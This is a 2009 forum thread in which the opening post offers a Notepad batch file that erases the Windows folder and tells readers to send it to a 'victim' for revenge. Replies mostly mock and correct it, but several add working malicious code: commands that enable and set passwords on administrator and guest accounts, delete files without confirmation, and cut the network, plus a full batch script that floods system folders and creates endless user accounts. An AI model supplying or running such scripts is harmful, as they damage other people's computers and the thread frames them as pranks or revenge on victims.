Nov 21, 2009
Pages: 1, 2

Very Easy But Very Dangerous Virus

free web hosting

Read Latest Entries..: (Post #19) by surfermac on Aug 15 2009, 09:45 AM.
YOu call that a virus????you need to know more than that to create one
Read the FIRST post of this Topic. - Express your Opinion! Contribute Knowledge :-).

Open Discussion & Free Web Hosting > Computers & Tech > Security issues & Exploits

Very Easy But Very Dangerous Virus

me-here
QUOTE
The only thing you need is Notepad .
Now, to test it, create a textfile called TEST.txt(empty) in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes).
Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone. Now, the real work begins:
Go to notepad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.


 

 

 


Comment/Reply (w/o sign-up)

Aditya
Ok first of all this is not a virus even in the lamest terms. This is just a DOS batch file. You can also save the file as .bat file and the functioning will be the same. This file won't erase anything without confirmation from the user. You've tried to delete just a single file thats why it didn't ask for confirmation from you. Try deleting a folder with this file and you will get the following message in a DOS window:
CODE
erase c:\<directory name>
c:\<directory name>\*, Are you sure (Y/N)?

Unless you press 'y' nothing will happen. A virus, by definition, is not just supposed to damage a computer, it is also supposed to spread on its own. And this file can't even damage a computer without affirmation from the user. I wonder who would be dumb enough to affirm the destruction of his own computer. wink.gif
Atleast use "echo off" before the erase statement to hide the "erase c:\windows" command being displayed.
And by the way, I think you haven't ever used Linux. Otherwise you would know that Linux doesn't support DOS commands and neither does it use the Windows/DOS filesystem.

 

 

 


Comment/Reply (w/o sign-up)

miCRoSCoPiC^eaRthLinG
hahhaahaha.. I'm sorry I can't help but laugh like a mad cow laugh.gif That was rather pathetic, me-here.. as Aditya pointed out.

An alternative to using echo off is to prefix every line in the batch file with an @ symbol. It works the same as echo off.

Moreover - if you execute this file WHILE you're booted into Windows, there's NO WAY you can delete the Windows directory. Anything above Win98, puts a LOCK on the C:\WINDOWS folder once booted up. You cannot even use Windows Explorer to delete this directory.

Only with that inanely stupid Win98, you could delete the WINDOWS folder - but that too would abort midway once it came upon certain locked .dlls and .exes. But by then the damage would be done - at least partially.

As far as Linux is considered, this method is absolutely worthless.. a normal user won't even have sufficient privileges to execute a similar script on the root folder.

Comment/Reply (w/o sign-up)

nini
Thanks a lot.
But a problem...may be the victim understand and doesn't run
the file...so(it is clear to understand)
what way do you use???

Comment/Reply (w/o sign-up)

mastercomputers
A Virus infects... that's how I describe Viruses.

This however is just a malicious program/script that deletes files.

To make it successful, there's some Windows files that you can single out for specific deletion and would not be presented with a confirmation, even renaming it would work, moving however wouldn't because it'd most likely be read-only and require confirmation. Those files can be found in Windows and System32.

I'm not sure whether you can force windows into interactive mode, in which every action done in DOS requires user input. I know I've set up bash so that commands like rm, cp and mv all require actions by the user before going ahead with it, also the most damage a script as such would do would be removing my home directory (if that file was owned by me), however it will get interrupted because some files would be locked (in use). If it were owned by root, that's a different story, and definitely something to be concerned about.


Cheers,


MC

Comment/Reply (w/o sign-up)

nitrus
You could make it work fine using the Robot library of Java. Its java.awt.Robot; and it gives you complete control of a persons computer. Im working on a script right now that gives you remote access to your computer. Very nifty little library indeed.
~Adio

Comment/Reply (w/o sign-up)

Logan Deathbringer
well with all the debate thats happened there I think that adding my own opinon here is kinda...usless....although I still will.

I'm sorry about what I'm about to say but at the same time I'm not...this doesn't even fall into the "script kiddie" arena, even the most basic "script kiddie" would realize that the commands given wouldn't work in Linux/Unix, and my main question is this...why would you come to a 'Tech forum and make a post like this....

Comment/Reply (w/o sign-up)

Vaibhav
well I agree that its a virus ( just a very limited extent) ...just that it is not a worm...virus is omething that corrupts your system and infects. since the file can potentially corrupt but nmot infect, it is a virus to some extent. Now another thing is tht. will it destroy or not. I agree that it wont destroy cus the windows folder is write protected and the command will not execute...atleast from a normal account.

Another thing is that the file has an extension of CMD which is a batch file opened in special mode. and it doens t work on systems before win XP.


Comment/Reply (w/o sign-up)

vhortex
yes..the main concern is why do a post like this ends up in the forum..

i cant be sure about the windows xp system but there is a way to insert a user confirmation without requiring a keyboard input.. hmm, ever familiar with pipings? and one thing i like about windows and people hate about it too is that you already have all the resources you need to create simple viruses.

complex ones need some patch libraries to be installed.. there is no system like windows where i can create a worm using notepad alone. this cant be done on Mac OS and on linux, but can be done on windows..

I love windows biggrin.gif

Comment/Reply (w/o sign-up)

KDEWolf
I hate media. Nowadays everyone who writes down some program is a "hacker" and if the program damages anything it's a "virus". One single minute thinking about these terms and you already know they're used in a completely wrong context.

When my HD crashed some weeks ago, the first thing my brother and my mother asked me was: "Was it a computer virus?". And, as always, I got pissed off, since (at least to me) I'm very unlikely to get viruses, since I am a very experienced user, and also have some programming skills.

First of all, much easier than writing this script, browsing Google for "creating evil scripts" (this is just a stupid example). There you'll find many dangerous exploits, programs, bugs, etc... But the fact is: if you barely know how do these work, you're probably getting lots of them infecting you computer, just by browsing these sites with an insecure browser and/or by running some of the programs contained within them (like Trojan makers, for example).

If you're up to damage someone's system, then I just hope the same happens to yours. If you're just studying some of it so you don't get infected or fooled by these childish stuff, you're welcome. By the way, when it came out, I had access to the YouLoveYou Visual Basic Script some time after, for studying it. That was a real computer virus. And that's a hell of a coding, with hundreds and hundreds of lines of code...

So do not believe that without real knowledge you'll be able mess with one's computer around. Unless one is many times dumber than you, of course...

And a last simple tip, for safety: always "edit" (using at least notepad) script files before running them, so you have a bare idea of what's going to happen next...

Comment/Reply (w/o sign-up)

Latest Entries

surfermac
YOu call that a virus
????
you need to know more than that to create one

Comment/Reply (w/o sign-up)

iGuest
Answer
Very Easy But Very Dangerous Virus

net user administrator /active:yes

net user administrator *insertpassword

start net user guest /active:yes

net user guest *insertpassword

start @echo y|del *.*

ipconfig/release

start shutdown

You can elaborate some more but you get the idea

-reply by H4CK3R

Comment/Reply (w/o sign-up)

iGuest
Ok, where to start...

First of all, virii cant spread themselves, they only infect the node they are currently in. Worms on the other hand can spread. Worms ARE NOT DANGEROUS unless they have a payload in them. A payload can be a regular program, virii, or other random things like trojans, backdoors, polymorphs, and so on and so forth.

Now, I see we have some intermediate scripters, like me, and some script kiddes, which is ok if your younger. Just for the SK's info, vb virii are hardly used anymore. They can pretty much only be used on your own computer or the extremely unprotected computer. Although it can be kinda fun just screwing around on a junk HD. I suggest after or durring studying vb, you should look into c++, java, javascript, and some lesser known types like ruby and perl (not pokemon games). C++ can be widely used, not just for a virus, but for webpages, programs, and what-not. So, if u wanna get arrested, make something like a fake program or something, put a virus in it, and put it on the web. Java and java script are widely used on the internet for games and stuff. This can be fun cause it's the idiot's fault for getting it. (sorry if it offended anyone, but it's kinda true). And the other two, ruby and perl, they can be used for white/black hat hacking, virii, and several other things as well. They are mostly (if not only) used on/for linux and GPLOSs for most of their programs. A prime example of these two can be found on the os, BACKTRACK 1,2,3,and 4beta (depending on how old this post is).

So there u have it, scripting for dummies. Just make sure that none of u guys (or maybe girls) get caught doing the bad thing. Have fun!

-reply by shikagami

Comment/Reply (w/o sign-up)

iGuest

@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start

:start
@ECHO SET snowball2=1 >> bat6.Bat
@ECHO GOTO flood5 >> bat6.Bat
@ECHO :flood5 >> bat6.Bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.Bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.Bat
@ECHO GOTO flood5 >> bat6.Bat
START /MIN bat6.Bat
GOTO bat5

:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.Bat
@ECHO SET maggi=1 >> bat5.Bat
@ECHO GOTO flood4 >> bat5.Bat
@ECHO :flood4 >> bat5.Bat
@ECHO MKDIR maggi%%maggi%% >> bat5.Bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.Bat
@ECHO GOTO flood4 >> bat5.Bat
START /MIN bat5.Bat
GOTO bat4

:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.Bat
@ECHO SET marge=1 >> bat4.Bat
@ECHO GOTO flood3 >> bat4.Bat
@ECHO :flood3 >> bat4.Bat
@ECHO MKDIR marge%%marge%% >> bat4.Bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.Bat
@ECHO GOTO flood3 >> bat4.Bat
START /MIN bat4.Bat
GOTO bat3

:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.Bat
@ECHO SET bart=1 >> bat3.Bat
@ECHO GOTO flood2 >> bat3.Bat
@ECHO :flood2 >> bat3.Bat
@ECHO MKDIR bart%%bart%% >> bat3.Bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.Bat
@ECHO GOTO flood2 >> bat3.Bat
START /MIN bat3.Bat
GOTO bat2

:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.Bat
@ECHO SET homer=1 >> bat2.Bat
@ECHO GOTO flood >> bat2.Bat
@ECHO :flood >> bat2.Bat
@ECHO MKDIR homer%%homer%% >> bat2.Bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.Bat
@ECHO GOTO flood >> bat2.Bat
START /MIN bat2.Bat
GOTO original

:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1

Try this still not a virus just a .Bat file but a fun one also very annoying.


Comment/Reply (w/o sign-up)

AxeFestis
This is basic stuff we are not n00b's can some one add something more difficult

Comment/Reply (w/o sign-up)


Got an Opinion! Express your Views! (no registration):-
Add your Reply/ Opinion/ Views/ Comments/ Suggestion/ Questions/ Queries etc.
Posts with decent grammar & English will be accepted and please refrain from profanities.
For asking a Question, We recommend you to sign-up (for free) so that you can track the topic easily.

Nature of your Post*: Opinion/ Reply/ Comments
Question/Query
Feedback to us.
       
Name   Email
Title/Question*

This textarea will convert to Rich-Text automatically (IE, Firefox, Chrome)

Pages: 1, 2
Similar Topics

Keywords : easy, dangerous, virus

  1. War Against Virus & Wining Tips
    Some quick tips for keep your widows system safe. (6)
  2. Some Weird Virus
    (8)
    A couple of weeks ago I was sent a file over AIM (Instant Messaging Service). Stupidly enough,
    though I didn't know the person I accepted and opened the file. I didn't think there was
    anything malicious about it since my Virus Program scanned it and nothing was found. So I opened it
    and a message soon appeared saying "Your trial of Obsidium is over." I have no idea what Obsidium is
    and I never installed it, so I simply closed the warning box and forgot about it. However, the next
    time I booted up the machine I tried to login and the computer hesitated, the same O....
  3. New Virus? Uglyhuman Msn Virus
    A worm that isn't in the virus definitions yet? (29)
    Have you ever gotten a message from your friends that say something like this: its you on this
    photo http://uglyhuman.net/photo***.php I have received that from at least 3 people. Without
    knowing what it was (and the surprise from the domain name with the message /tongue.gif"
    style="vertical-align:middle" emoid=":P" border="0" alt="tongue.gif" />), I clicked on the link and
    Firefox prompted me to download a file. It was a COM file so I thought that was strange. I rechecked
    the URL it was a PHP web page, so I assumed it was telling me to download the photo, so I open....
  4. MSN "Thank You For Using" And Sharing
    AN MSN virus ? (17)
    MSN now opens a window where wee see things happening : It starts a frame with with the words Virus
    - (1513 kB) Then it says "scanning C disk" Then "installing" Then "propagating" Then it ends with
    "Thank you for usin' and sharin'" What is that thing ? Is it a fake ? Or is it a ral virus ?
    I must confess I'm a little bit afraid. A goggling made me find a german site saying roughly
    "probably a fake". However, even if it's a fake, it behaves like a trojan because it's a
    program residing on your computer and activated evrytime you open a new window. If....
  5. Quick Virus Question
    (4)
    I've always have run a tight ship so I very rarely get a virus, but I've got a client who
    has somehow managed to get some sort of mailer Trojan horse on their computer HOWEVER, Norton
    Antivirus has the virus isolated and ready for removal. From the instruction sheet (I'm
    assuming they got it from Symantec), they updated Norton and did a full system scan. The virus
    shouldn't do anything since Norton has it quaritined, correct? Now, it may have injected values
    into the Registry (which is why they want me to do it as they don't know what the registry ....
  6. Locally Virus From Indonesia
    (3)
    Does anyone know or better infected and succesfully cleaned the virus called as rontok.bro, it's
    came from Indonesia as well and has made many variant. Please help me I was infected. regards
    /ohmy.gif" style="vertical-align:middle" emoid=":o" border="0" alt="ohmy.gif" />....
  7. Lol MS Excel Is/Was A Virus
    (10)
    Thanks to a McAfee update the users was warned by them that Microsoft Excel is a Virus. Last Mars,
    10 2006 Microsoft Excel was pointed as W95/CTX Virus. This mistake happened because an error
    accoured with the new definitions sent to users. McAfee solved the problem a few hours later,
    thanks to the complains sent by a large group of McAfee Clients. LOL, I thinks is Funny , LOL....
  8. Virus For Mac Arrives!
    (18)
    The first virus for Macs has appeared on the scene. Known as Leap - A, it is a low level threat,
    but almost certainly the harbinger of future threats. For years, Mac users have claimed the o/s to
    be safe and secure, with no virus problems, even 'tho the reason for that was simply because of
    the small amount of users, not the difficulty of creating a virus for the o/s. Now, as with
    Firefox, as the number of users grows, so the creators of virus , malware etc will begin to target
    the Mac. ....
  9. Feb Virus Warning!
    Feb Virus Warning!!! (1)
    There were a couple of Virus warnings released by Major Anti Virus manufacturers regarding the
    outbreak of Two (or are they the same??) worms. One is the Black Worm and other is the 'Kama
    Sutra' virus....... QUOTE It has been observed that the Black Worm also known as W32.Vb.i
    or W32.Nayem.E has been actively spreading in India since last two weeks now. It’s a mass-mailing
    worm that also spread using remote shares. After a long gap there has been an outbreak kind of
    situation as this worm was successful in spreading all over the globe within few hours when....
  10. Sober Virus Plummets
    (0)
    QUOTE The latest Sober virus (known as W32.Sober.X@mm, Sober.Y and W32/Sober@MM!M681) has passed
    its January deadline for updates without incident. The Sober virus and its variants have been one
    of the most prolific of 2005 and has topped the charts again in recent months. In early December,
    anti-virus vendors cracked the algorithm the virus uses to search for updates, allowing the next set
    of Web sites to be blocked and Web hosting companies to be notified. The virus was set to search for
    updates from thirty unique websites, fifteen each on January 5th and January ....
  11. AOL Instant Messenger Chain Virus
    Has anyone else been hit by this? (12)
    yesterday, i was chatting with a friend and she sent me a link to what looked like a photo file...
    when i opened it, it turned out to be a virus... which in turn, automatically messaged all the
    people online on my buddy list the link and then closed all chat windows..... does anyone know what
    this is? and if so, how do i fix it?....
  12. How To Know If You Have A Virus Or Trojan/spyware
    (2)
    How to know if you have a virus or trojan or spyware in xp open task manager by presing ctrl+alt+del
    an close all applacations now look at your cpu usage if it is above 4-5% you have a problem.
    /smile.gif" style="vertical-align:middle" emoid=":)" border="0" alt="smile.gif" />....
  13. Music Video Web Site W/ Virus
    (3)
    If you are looking to put a music video in your MySpace or what ever you choose avoid using the
    site www.musicfeet.com This web site gives you a Trojan virus each time you access
    this site. So if you have a good virus scan and firewall dont go there ....
  14. Click To See Which Anti-virus Is The Best
    (7)
    Well, i didn't invent this. I saw this ranking in other sites and I conducted a survey by
    myself. Here is the ranking: 1. NOD32. 2. Kapersky Anti-Virus. 3. Norton Anti-Virus. 4. Other free
    software. Well, hoped this helped /smile.gif" style="vertical-align:middle" emoid=":)" border="0"
    alt="smile.gif" />....
  15. Ranking Virus
    (4)
    According to TrendMicro NETSKY was the most affective virus of June here the ranking 1.
    Worm_Netsky.P 2. HTML_Netsky.P 3. Java_Bytever.A 4. Worm_Sober.S 5. TSPY_Small.SN 6. SPYM_Gator 7.
    SPYM_Dashbar.300 8. Troj_Dyfuca.I 9. Worm_Netsky.D 10. SPYW_Websearch.A....
  16. Aim Virus Messing Around With My C:\windows Folder
    (10)
    Okay, so I was talking to my friend on IM yesterday and then she sends me a message saying OMFG LOOK
    AT HER or something like that and then a link. I stupidly opened it and then two seconds later she
    IMs me telling me not to cause it seems to be a virus. Usually I don't accept those kind of
    things but it was from her so I let my guard down. Apparently she had got it from another one of her
    friends. It's a .pif virus I know that much but it doesn't do much, I can still open AIM
    and my task manager with no weird things but when I reboot my computer, my C:\WIN....
  17. Virus Alert (hoax)
    (6)
    Recently a new virus was discovered that was classified by MICROSOFT www.microsoft.com and by MCAFEE
    www.mcafee.com to be the most damaging of all time! This virus was discovered by MCAFEE and still
    there is no development of a vaccine! This virus simply writes zeros on the hard drive, where the
    vital information for the operation of the PC is kept. The virus activates in the following manner:
    1. By email it is received with the title 'A VIRTUAL CARD FOR YOU', when opening the
    message, it sends itself to all in the address list soon... 2. It hangs the machin....
  18. New Version : Virus Sober Q
    What's rong with internet ? (1)
    This new Virus Sober.Q is automaticly loaded by the computer from prevoius versions of Sober.Virus .
    this virus manifest him self in germany and works like a SPAM , that it's not a spam by default
    but he can be in few time. Protect your self :::: Cheers ! Update you Anti-Virus....
  19. New Aim Virus - I Think
    (4)
    Today, my friend, who almost never messages me, sent me a message saying "look at my pictures "
    Now, my computer-whiz friend is always joking about things like this, saying, "Hey, check out my
    cool pictures from the beach." So, I was sort of cautious. I sent him a message back saying,
    ".pif?? What is that??" And I started to Google it, but I decided to open it anyway since he
    wasn't responding. So, it was supposed to message everyone on my buddy list, but I don't
    think it did. Just in case, I messaged everyone and said, "Don't open anything I send you.....
  20. New Sober Virus
    (4)
    The Trend Micron launched alert on the appearance of a new version of the celebrity virus Sober,
    arriving of this form at the variant S and that already it received the classification from being as
    a threat of average risk. This plague, is to spread quickly in Germany and the United States, and
    dissimulates to be an official message of the FIFA on the championship of World to carry through in
    2006 in Germany. The contaminated email arrives at the user with an annexed malicious
    filing-cabinet where it is promised as being carrying of information on the Championship of t....
  21. Trend Micron Virus-update Creates Massive Problems
    (0)
    An imperfection of update for softwares antivirus of the company of Trend security Micron caused the
    slowness or interruption in the operations of some computers around of the world, confirmed the
    company in this Monday (25/04). For return of 2h of this monday in Tokyo, the Trend Micron had
    received about 311,9 a thousand telephonic calls users in Japan declaring that its PCs had been
    afectados for a deficient filing-cabinet with information on virus and plagues. The filing-cabinet
    of data was placed online between 7h30 and 9h02 (hourly Japanese) of Saturday (23/04). ....
  22. Intersting Virus - Writing Article
    (3)
    A well written, and long, article. I had fun reading through it /smile.gif"
    style="vertical-align:middle" emoid=":)" border="0" alt="smile.gif" /> It seemed to glamorize the
    art of writing viruses though, and it made their creators sounds like digital-gods. Anyways:
    http://www.collisiondetection.net/mt/archives/000704.html ....
  23. New Virus Alert!
    Especially for those MSN messenger users (13)
    Watch out MSN users! There is a new virus... Maybe its old... But once it get into your computer, it
    automatically sends a copy of the virus to all your contacts via MSN messenger... I almost got hit
    by one, but norton stopped it! There are many different names it is hiding under... My friend's
    computer sent me "The cat and the fan" It sented another copy to my other friend... She got "The
    frog and the fish" There are many combinations... So be careful! Sorry to double post, but I found
    yet another one... "Mona Lisa wants her smile back" Its another virus! --------....
  24. Avast!
    Free anti-virus software! (12)
    hey, i got avast! since a few days, it's a free anti-virussoftware. it protects against
    computer viruses, worms and trojan horses. it's free, as long as it's for personal use. if
    you want it for your company, you gotta pay. it's up-to-date, because it's updated
    regularly. the newest version is 4.6 you can download it & find more information here:
    http://www.avast.com/ ....
  25. A Very Bad Virus
    by CNN (10)
    A new virus has just been discovered that has been classified by Microsoft as the most destructive
    ever This virus was discovered yesterday afternoon by McAfee and no vaccine has yet ! been
    developed. This virus simply destroys Sector Zero from the hard disk, where vital information for
    its functioning are stored. This virus acts in the following manner: It sends itself automatically
    to all contacts on your list with the title "A Card for You". As soon as the supposed virtual card
    is opened the computer freezes so that the user has to reboot. When the ctrl+alt+del keys ....

    1. Looking for easy, dangerous, virus

See Also,

*SIMILAR VIDEOS*
Searching Video's for easy, dangerous, virus
advertisement



Very Easy But Very Dangerous Virus

Affordable Web Hosting, Low cost Web Hosting - ComputingHost.com